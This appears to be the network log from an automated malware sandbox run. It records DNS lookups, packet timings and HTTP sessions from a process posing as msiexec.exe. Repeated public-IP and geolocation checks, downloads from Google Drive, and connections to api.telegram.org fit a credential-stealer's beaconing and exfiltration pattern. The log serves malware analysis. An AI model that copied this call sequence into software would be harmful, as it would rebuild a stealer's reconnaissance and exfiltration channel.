                                                                                                                                      Nov 21, 2024 10:36:58.506778955 CET44349739188.114.96.3192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:58.513137102 CET49739443192.168.2.4188.114.96.3
                                                                                                                                      Nov 21, 2024 10:36:58.555339098 CET44349739188.114.96.3192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:58.957515001 CET44349739188.114.96.3192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:58.957578897 CET44349739188.114.96.3192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:58.957676888 CET49739443192.168.2.4188.114.96.3
                                                                                                                                      Nov 21, 2024 10:36:59.006433010 CET49739443192.168.2.4188.114.96.3
                                                                                                                                      Nov 21, 2024 10:36:59.013725042 CET4973880192.168.2.4132.226.247.73
                                                                                                                                      Nov 21, 2024 10:36:59.133352995 CET8049738132.226.247.73192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:59.455626011 CET8049738132.226.247.73192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:59.458566904 CET49740443192.168.2.4188.114.96.3
                                                                                                                                      Nov 21, 2024 10:36:59.458626032 CET44349740188.114.96.3192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:59.458726883 CET49740443192.168.2.4188.114.96.3
                                                                                                                                      Nov 21, 2024 10:36:59.459029913 CET49740443192.168.2.4188.114.96.3
                                                                                                                                      Nov 21, 2024 10:36:59.459048033 CET44349740188.114.96.3192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:59.510232925 CET4973880192.168.2.4132.226.247.73
                                                                                                                                      Nov 21, 2024 10:37:00.715768099 CET44349740188.114.96.3192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:00.726270914 CET49740443192.168.2.4188.114.96.3
                                                                                                                                      Nov 21, 2024 10:37:00.726306915 CET44349740188.114.96.3192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:01.172354937 CET44349740188.114.96.3192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:01.172421932 CET44349740188.114.96.3192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:01.172529936 CET49740443192.168.2.4188.114.96.3
                                                                                                                                      Nov 21, 2024 10:37:01.173043966 CET49740443192.168.2.4188.114.96.3
                                                                                                                                      Nov 21, 2024 10:37:01.176875114 CET4973880192.168.2.4132.226.247.73
                                                                                                                                      Nov 21, 2024 10:37:01.178201914 CET4974280192.168.2.4132.226.247.73
                                                                                                                                      Nov 21, 2024 10:37:01.296650887 CET8049738132.226.247.73192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:01.296735048 CET4973880192.168.2.4132.226.247.73
                                                                                                                                      Nov 21, 2024 10:37:01.297703028 CET8049742132.226.247.73192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:01.297781944 CET4974280192.168.2.4132.226.247.73
                                                                                                                                      Nov 21, 2024 10:37:01.297985077 CET4974280192.168.2.4132.226.247.73
                                                                                                                                      Nov 21, 2024 10:37:01.417529106 CET8049742132.226.247.73192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:02.602108002 CET8049742132.226.247.73192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:02.603385925 CET49743443192.168.2.4188.114.96.3
                                                                                                                                      Nov 21, 2024 10:37:02.603429079 CET44349743188.114.96.3192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:02.603491068 CET49743443192.168.2.4188.114.96.3
                                                                                                                                      Nov 21, 2024 10:37:02.603820086 CET49743443192.168.2.4188.114.96.3
                                                                                                                                      Nov 21, 2024 10:37:02.603833914 CET44349743188.114.96.3192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:02.650777102 CET4974280192.168.2.4132.226.247.73
                                                                                                                                      Nov 21, 2024 10:37:03.911047935 CET44349743188.114.96.3192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:03.913491011 CET49743443192.168.2.4188.114.96.3
                                                                                                                                      Nov 21, 2024 10:37:03.913527966 CET44349743188.114.96.3192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:04.377857924 CET44349743188.114.96.3192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:04.377959967 CET44349743188.114.96.3192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:04.378056049 CET49743443192.168.2.4188.114.96.3
                                                                                                                                      Nov 21, 2024 10:37:04.378426075 CET49743443192.168.2.4188.114.96.3
                                                                                                                                      Nov 21, 2024 10:37:04.382718086 CET4975080192.168.2.4132.226.247.73
                                                                                                                                      Nov 21, 2024 10:37:04.502372026 CET8049750132.226.247.73192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:04.502485991 CET4975080192.168.2.4132.226.247.73
                                                                                                                                      Nov 21, 2024 10:37:04.502619982 CET4975080192.168.2.4132.226.247.73
                                                                                                                                      Nov 21, 2024 10:37:04.622752905 CET8049750132.226.247.73192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:05.811295986 CET8049750132.226.247.73192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:05.818284035 CET49756443192.168.2.4188.114.96.3
                                                                                                                                      Nov 21, 2024 10:37:05.818311930 CET44349756188.114.96.3192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:05.818376064 CET49756443192.168.2.4188.114.96.3
                                                                                                                                      Nov 21, 2024 10:37:05.818612099 CET49756443192.168.2.4188.114.96.3
                                                                                                                                      Nov 21, 2024 10:37:05.818633080 CET44349756188.114.96.3192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:05.853895903 CET4975080192.168.2.4132.226.247.73
                                                                                                                                      Nov 21, 2024 10:37:07.082367897 CET44349756188.114.96.3192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:07.083822966 CET49756443192.168.2.4188.114.96.3
                                                                                                                                      Nov 21, 2024 10:37:07.083847046 CET44349756188.114.96.3192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:07.538053989 CET44349756188.114.96.3192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:07.538119078 CET44349756188.114.96.3192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:07.538196087 CET49756443192.168.2.4188.114.96.3
                                                                                                                                      Nov 21, 2024 10:37:07.538567066 CET49756443192.168.2.4188.114.96.3
                                                                                                                                      Nov 21, 2024 10:37:07.542778969 CET4975080192.168.2.4132.226.247.73
                                                                                                                                      Nov 21, 2024 10:37:07.543420076 CET4975780192.168.2.4132.226.247.73
                                                                                                                                      Nov 21, 2024 10:37:07.663486004 CET8049750132.226.247.73192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:07.663558006 CET8049757132.226.247.73192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:07.663559914 CET4975080192.168.2.4132.226.247.73
                                                                                                                                      Nov 21, 2024 10:37:07.663763046 CET4975780192.168.2.4132.226.247.73
                                                                                                                                      Nov 21, 2024 10:37:07.663763046 CET4975780192.168.2.4132.226.247.73
                                                                                                                                      Nov 21, 2024 10:37:07.785105944 CET8049757132.226.247.73192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:09.062751055 CET8049757132.226.247.73192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:09.064145088 CET49763443192.168.2.4188.114.96.3
                                                                                                                                      Nov 21, 2024 10:37:09.064235926 CET44349763188.114.96.3192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:09.064378977 CET49763443192.168.2.4188.114.96.3
                                                                                                                                      Nov 21, 2024 10:37:09.064652920 CET49763443192.168.2.4188.114.96.3
                                                                                                                                      Nov 21, 2024 10:37:09.064688921 CET44349763188.114.96.3192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:09.103924990 CET4975780192.168.2.4132.226.247.73
                                                                                                                                      Nov 21, 2024 10:37:10.322949886 CET44349763188.114.96.3192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:10.324482918 CET49763443192.168.2.4188.114.96.3
                                                                                                                                      Nov 21, 2024 10:37:10.324517965 CET44349763188.114.96.3192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:10.777095079 CET44349763188.114.96.3192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:10.777178049 CET44349763188.114.96.3192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:10.777235985 CET49763443192.168.2.4188.114.96.3
                                                                                                                                      Nov 21, 2024 10:37:10.778039932 CET49763443192.168.2.4188.114.96.3
                                                                                                                                      Nov 21, 2024 10:37:10.794323921 CET4975780192.168.2.4132.226.247.73
                                                                                                                                      Nov 21, 2024 10:37:10.795500994 CET4976980192.168.2.4132.226.247.73
                                                                                                                                      Nov 21, 2024 10:37:10.914329052 CET8049757132.226.247.73192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:10.914412975 CET4975780192.168.2.4132.226.247.73
                                                                                                                                      Nov 21, 2024 10:37:10.915085077 CET8049769132.226.247.73192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:10.915165901 CET4976980192.168.2.4132.226.247.73
                                                                                                                                      Nov 21, 2024 10:37:10.915276051 CET4976980192.168.2.4132.226.247.73
                                                                                                                                      Nov 21, 2024 10:37:11.035013914 CET8049769132.226.247.73192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:12.284670115 CET8049769132.226.247.73192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:12.286322117 CET49770443192.168.2.4188.114.96.3
                                                                                                                                      Nov 21, 2024 10:37:12.286360979 CET44349770188.114.96.3192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:12.286444902 CET49770443192.168.2.4188.114.96.3
                                                                                                                                      Nov 21, 2024 10:37:12.286685944 CET49770443192.168.2.4188.114.96.3
                                                                                                                                      Nov 21, 2024 10:37:12.286700010 CET44349770188.114.96.3192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:12.338282108 CET4976980192.168.2.4132.226.247.73
                                                                                                                                      Nov 21, 2024 10:37:13.544193029 CET44349770188.114.96.3192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:13.546004057 CET49770443192.168.2.4188.114.96.3
                                                                                                                                      Nov 21, 2024 10:37:13.546032906 CET44349770188.114.96.3192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:13.998331070 CET44349770188.114.96.3192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:13.998399973 CET44349770188.114.96.3192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:13.998454094 CET49770443192.168.2.4188.114.96.3
                                                                                                                                      Nov 21, 2024 10:37:13.998949051 CET49770443192.168.2.4188.114.96.3
                                                                                                                                      Nov 21, 2024 10:37:14.002125025 CET4976980192.168.2.4132.226.247.73
                                                                                                                                      Nov 21, 2024 10:37:14.003277063 CET4977680192.168.2.4132.226.247.73
                                                                                                                                      Nov 21, 2024 10:37:14.121982098 CET8049769132.226.247.73192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:14.122086048 CET4976980192.168.2.4132.226.247.73
                                                                                                                                      Nov 21, 2024 10:37:14.122859001 CET8049776132.226.247.73192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:14.122930050 CET4977680192.168.2.4132.226.247.73
                                                                                                                                      Nov 21, 2024 10:37:14.123074055 CET4977680192.168.2.4132.226.247.73
                                                                                                                                      Nov 21, 2024 10:37:14.242603064 CET8049776132.226.247.73192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:15.518369913 CET8049776132.226.247.73192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:15.523257971 CET49782443192.168.2.4188.114.96.3
                                                                                                                                      Nov 21, 2024 10:37:15.523344994 CET44349782188.114.96.3192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:15.523428917 CET49782443192.168.2.4188.114.96.3
                                                                                                                                      Nov 21, 2024 10:37:15.526954889 CET49782443192.168.2.4188.114.96.3
                                                                                                                                      Nov 21, 2024 10:37:15.526988029 CET44349782188.114.96.3192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:15.572681904 CET4977680192.168.2.4132.226.247.73
                                                                                                                                      Nov 21, 2024 10:37:16.833446026 CET44349782188.114.96.3192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:16.836932898 CET49782443192.168.2.4188.114.96.3
                                                                                                                                      Nov 21, 2024 10:37:16.837011099 CET44349782188.114.96.3192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:17.561119080 CET44349782188.114.96.3192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:17.561201096 CET44349782188.114.96.3192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:17.561513901 CET49782443192.168.2.4188.114.96.3
                                                                                                                                      Nov 21, 2024 10:37:17.561769009 CET49782443192.168.2.4188.114.96.3
                                                                                                                                      Nov 21, 2024 10:37:17.565013885 CET4977680192.168.2.4132.226.247.73
                                                                                                                                      Nov 21, 2024 10:37:17.566107035 CET4978880192.168.2.4132.226.247.73
                                                                                                                                      Nov 21, 2024 10:37:17.684792995 CET8049776132.226.247.73192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:17.685435057 CET4977680192.168.2.4132.226.247.73
                                                                                                                                      Nov 21, 2024 10:37:17.685503960 CET8049788132.226.247.73192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:17.688991070 CET4978880192.168.2.4132.226.247.73
                                                                                                                                      Nov 21, 2024 10:37:17.689116001 CET4978880192.168.2.4132.226.247.73
                                                                                                                                      Nov 21, 2024 10:37:17.808583021 CET8049788132.226.247.73192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:19.085024118 CET8049788132.226.247.73192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:19.086563110 CET49789443192.168.2.4188.114.96.3
                                                                                                                                      Nov 21, 2024 10:37:19.086604118 CET44349789188.114.96.3192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:19.086680889 CET49789443192.168.2.4188.114.96.3
                                                                                                                                      Nov 21, 2024 10:37:19.086919069 CET49789443192.168.2.4188.114.96.3
                                                                                                                                      Nov 21, 2024 10:37:19.086944103 CET44349789188.114.96.3192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:19.135175943 CET4978880192.168.2.4132.226.247.73
                                                                                                                                      Nov 21, 2024 10:37:20.350342035 CET44349789188.114.96.3192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:20.352237940 CET49789443192.168.2.4188.114.96.3
                                                                                                                                      Nov 21, 2024 10:37:20.352261066 CET44349789188.114.96.3192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:20.804419041 CET44349789188.114.96.3192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:20.804497004 CET44349789188.114.96.3192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:20.804584026 CET49789443192.168.2.4188.114.96.3
                                                                                                                                      Nov 21, 2024 10:37:20.804909945 CET49789443192.168.2.4188.114.96.3
                                                                                                                                      Nov 21, 2024 10:37:20.808134079 CET4978880192.168.2.4132.226.247.73
                                                                                                                                      Nov 21, 2024 10:37:20.809137106 CET4979580192.168.2.4132.226.247.73
                                                                                                                                      Nov 21, 2024 10:37:20.927921057 CET8049788132.226.247.73192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:20.928069115 CET4978880192.168.2.4132.226.247.73
                                                                                                                                      Nov 21, 2024 10:37:20.928617954 CET8049795132.226.247.73192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:20.928706884 CET4979580192.168.2.4132.226.247.73
                                                                                                                                      Nov 21, 2024 10:37:20.928862095 CET4979580192.168.2.4132.226.247.73
                                                                                                                                      Nov 21, 2024 10:37:21.048389912 CET8049795132.226.247.73192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:22.279377937 CET8049795132.226.247.73192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:22.281032085 CET49801443192.168.2.4188.114.96.3
                                                                                                                                      Nov 21, 2024 10:37:22.281079054 CET44349801188.114.96.3192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:22.281164885 CET49801443192.168.2.4188.114.96.3
                                                                                                                                      Nov 21, 2024 10:37:22.281510115 CET49801443192.168.2.4188.114.96.3
                                                                                                                                      Nov 21, 2024 10:37:22.281526089 CET44349801188.114.96.3192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:22.322696924 CET4979580192.168.2.4132.226.247.73
                                                                                                                                      Nov 21, 2024 10:37:23.586167097 CET44349801188.114.96.3192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:23.587977886 CET49801443192.168.2.4188.114.96.3
                                                                                                                                      Nov 21, 2024 10:37:23.588001966 CET44349801188.114.96.3192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:24.049313068 CET44349801188.114.96.3192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:24.049484968 CET44349801188.114.96.3192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:24.049577951 CET49801443192.168.2.4188.114.96.3
                                                                                                                                      Nov 21, 2024 10:37:24.050028086 CET49801443192.168.2.4188.114.96.3
                                                                                                                                      Nov 21, 2024 10:37:24.087382078 CET4979580192.168.2.4132.226.247.73
                                                                                                                                      Nov 21, 2024 10:37:24.207231045 CET8049795132.226.247.73192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:24.207387924 CET4979580192.168.2.4132.226.247.73
                                                                                                                                      Nov 21, 2024 10:37:24.321633101 CET49806443192.168.2.4149.154.167.220
                                                                                                                                      Nov 21, 2024 10:37:24.321749926 CET44349806149.154.167.220192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:24.321860075 CET49806443192.168.2.4149.154.167.220
                                                                                                                                      Nov 21, 2024 10:37:24.322374105 CET49806443192.168.2.4149.154.167.220
                                                                                                                                      Nov 21, 2024 10:37:24.322403908 CET44349806149.154.167.220192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:25.696227074 CET44349806149.154.167.220192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:25.696378946 CET49806443192.168.2.4149.154.167.220
                                                                                                                                      Nov 21, 2024 10:37:25.698532104 CET49806443192.168.2.4149.154.167.220
                                                                                                                                      Nov 21, 2024 10:37:25.698548079 CET44349806149.154.167.220192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:25.698888063 CET44349806149.154.167.220192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:25.700367928 CET49806443192.168.2.4149.154.167.220
                                                                                                                                      Nov 21, 2024 10:37:25.747344971 CET44349806149.154.167.220192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:26.199915886 CET44349806149.154.167.220192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:26.200073004 CET44349806149.154.167.220192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:26.200186968 CET49806443192.168.2.4149.154.167.220
                                                                                                                                      Nov 21, 2024 10:37:26.202439070 CET49806443192.168.2.4149.154.167.220
                                                                                                                                      Nov 21, 2024 10:37:32.396619081 CET4974280192.168.2.4132.226.247.73
                                                                                                                                      Nov 21, 2024 10:37:32.612737894 CET49824443192.168.2.4149.154.167.220
                                                                                                                                      Nov 21, 2024 10:37:32.612785101 CET44349824149.154.167.220192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:32.613074064 CET49824443192.168.2.4149.154.167.220
                                                                                                                                      Nov 21, 2024 10:37:32.613312006 CET49824443192.168.2.4149.154.167.220
                                                                                                                                      Nov 21, 2024 10:37:32.613327980 CET44349824149.154.167.220192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:34.072730064 CET44349824149.154.167.220192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:34.074259996 CET49824443192.168.2.4149.154.167.220
                                                                                                                                      Nov 21, 2024 10:37:34.074295044 CET44349824149.154.167.220192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:34.074388027 CET49824443192.168.2.4149.154.167.220
                                                                                                                                      Nov 21, 2024 10:37:34.074407101 CET44349824149.154.167.220192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:34.773097992 CET44349824149.154.167.220192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:34.773202896 CET44349824149.154.167.220192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:34.773261070 CET49824443192.168.2.4149.154.167.220
                                                                                                                                      Nov 21, 2024 10:37:34.773745060 CET49824443192.168.2.4149.154.167.220
                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                      Nov 21, 2024 10:36:44.740709066 CET5596353192.168.2.41.1.1.1
                                                                                                                                      Nov 21, 2024 10:36:44.968758106 CET53559631.1.1.1192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:47.274569988 CET6332153192.168.2.41.1.1.1
                                                                                                                                      Nov 21, 2024 10:36:47.502852917 CET53633211.1.1.1192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:54.492470980 CET5299853192.168.2.41.1.1.1
                                                                                                                                      Nov 21, 2024 10:36:54.719132900 CET53529981.1.1.1192.168.2.4
                                                                                                                                      Nov 21, 2024 10:36:57.009727955 CET5837453192.168.2.41.1.1.1
                                                                                                                                      Nov 21, 2024 10:36:57.235858917 CET53583741.1.1.1192.168.2.4
                                                                                                                                      Nov 21, 2024 10:37:24.088157892 CET6488353192.168.2.41.1.1.1
                                                                                                                                      Nov 21, 2024 10:37:24.320821047 CET53648831.1.1.1192.168.2.4
                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                      Nov 21, 2024 10:36:44.740709066 CET192.168.2.41.1.1.10xddb7Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                                                      Nov 21, 2024 10:36:47.274569988 CET192.168.2.41.1.1.10x6b16Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                                      Nov 21, 2024 10:36:54.492470980 CET192.168.2.41.1.1.10xde0aStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                      Nov 21, 2024 10:36:57.009727955 CET192.168.2.41.1.1.10x801fStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                      Nov 21, 2024 10:37:24.088157892 CET192.168.2.41.1.1.10x39f1Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                      Nov 21, 2024 10:36:44.968758106 CET1.1.1.1192.168.2.40xddb7No error (0)drive.google.com142.250.186.78A (IP address)IN (0x0001)false
                                                                                                                                      Nov 21, 2024 10:36:47.502852917 CET1.1.1.1192.168.2.40x6b16No error (0)drive.usercontent.google.com172.217.16.129A (IP address)IN (0x0001)false
                                                                                                                                      Nov 21, 2024 10:36:54.719132900 CET1.1.1.1192.168.2.40xde0aNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                      Nov 21, 2024 10:36:54.719132900 CET1.1.1.1192.168.2.40xde0aNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                      Nov 21, 2024 10:36:54.719132900 CET1.1.1.1192.168.2.40xde0aNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                      Nov 21, 2024 10:36:54.719132900 CET1.1.1.1192.168.2.40xde0aNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                      Nov 21, 2024 10:36:54.719132900 CET1.1.1.1192.168.2.40xde0aNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                      Nov 21, 2024 10:36:54.719132900 CET1.1.1.1192.168.2.40xde0aNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                      Nov 21, 2024 10:36:57.235858917 CET1.1.1.1192.168.2.40x801fNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                      Nov 21, 2024 10:36:57.235858917 CET1.1.1.1192.168.2.40x801fNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                      Nov 21, 2024 10:37:24.320821047 CET1.1.1.1192.168.2.40x39f1No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                      • drive.google.com
                                                                                                                                      • drive.usercontent.google.com
                                                                                                                                      • reallyfreegeoip.org
                                                                                                                                      • api.telegram.org
                                                                                                                                      • checkip.dyndns.org
                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      0192.168.2.449738132.226.247.73808044C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Nov 21, 2024 10:36:54.847724915 CET151OUTGET / HTTP/1.1
                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                      Host: checkip.dyndns.org
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Nov 21, 2024 10:36:56.266486883 CET320INHTTP/1.1 200 OK
                                                                                                                                      Date: Thu, 21 Nov 2024 09:36:56 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Content-Length: 103
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Pragma: no-cache
                                                                                                                                      X-Request-ID: ad506bfc813be7b4d0a5fd0a04e3692a
                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
                                                                                                                                      Nov 21, 2024 10:36:56.270468950 CET127OUTGET / HTTP/1.1
                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                      Host: checkip.dyndns.org
                                                                                                                                      Nov 21, 2024 10:36:56.732161045 CET320INHTTP/1.1 200 OK
                                                                                                                                      Date: Thu, 21 Nov 2024 09:36:56 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Content-Length: 103
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Pragma: no-cache
                                                                                                                                      X-Request-ID: cf287bb0360b475e32bf2e2bbbc8256d
                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
                                                                                                                                      Nov 21, 2024 10:36:59.013725042 CET127OUTGET / HTTP/1.1
                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                      Host: checkip.dyndns.org
                                                                                                                                      Nov 21, 2024 10:36:59.455626011 CET320INHTTP/1.1 200 OK
                                                                                                                                      Date: Thu, 21 Nov 2024 09:36:59 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Content-Length: 103
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Pragma: no-cache
                                                                                                                                      X-Request-ID: 4723ecec01c0fd7baf775ed54025d572
                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      1192.168.2.449742132.226.247.73808044C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Nov 21, 2024 10:37:01.297985077 CET127OUTGET / HTTP/1.1
                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                      Host: checkip.dyndns.org
                                                                                                                                      Nov 21, 2024 10:37:02.602108002 CET320INHTTP/1.1 200 OK
                                                                                                                                      Date: Thu, 21 Nov 2024 09:37:02 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Content-Length: 103
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Pragma: no-cache
                                                                                                                                      X-Request-ID: 18ca110b8b1f5379bc0de7a0da06b24a
